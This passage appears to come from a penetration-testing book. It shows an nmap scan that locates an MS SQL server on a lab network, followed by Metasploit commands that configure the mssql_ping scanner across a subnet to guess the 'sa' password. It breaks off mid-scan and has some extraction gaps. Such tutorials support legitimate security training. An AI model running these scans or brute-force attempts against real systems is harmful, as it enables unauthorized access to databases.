Meterpreter
77
To begin, we identify the MS SQL installation, and then launch a MS SQL
Server brute force attack to see if we can guess a password. By default, MS SQL
is installed on TCP port 1433 and UDP port 1434, though newer versions
allow for installation on a dynamically allocated port, which can be random-
ized. Luckily, port 1434 UDP (for which we did not scan) remains the same
and can be queried to identify the dynamic port of the SQL server.
Here, we scan the system and see that MS SQL port 1434 UDP is open:
msf >
nmap -sU 192.168.33.130 –p1434
Nmap scan report for 192.168.33.130
Host is up (0.00033s latency).
PORT STATE SERVICE
1434/udp open ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
msf >
As you can see, we scan our host at and see that MS SQL UDP port 1434
at is open. (Chapters 11, 13, and 17 will cover MS SQL in much more depth.)
When targeting MS SQL, we can leverage the
mssql_ping
module to brute
force the MS SQL port and attempt to guess the username and password.
When MS SQL is first installed, the program will require the user to create an
sa
, or system administrator, account. You’ll often be able to guess or brute
force the
sa
account password, because when administrators install this appli-
cation they do not understand the security ramifications of using either a
blank password or something too simple.
In the next example, we look for the
mssql_ping
module and attempt to
brute force the
sa
account:
msf >
use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) >
show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
USERNAME sa no The username to authenticate as
msf auxiliary(mssql_ping) >
set RHOSTS 192.168.33.1/24
RHOSTS => 192.168.33.1/24
msf auxiliary(mssql_ping) >
set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) >
exploit
[*] Scanned 040 of 256 hosts (015% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 080 of 256 hosts (031% complete)
[*] Scanned 115 of 256 hosts (044% complete)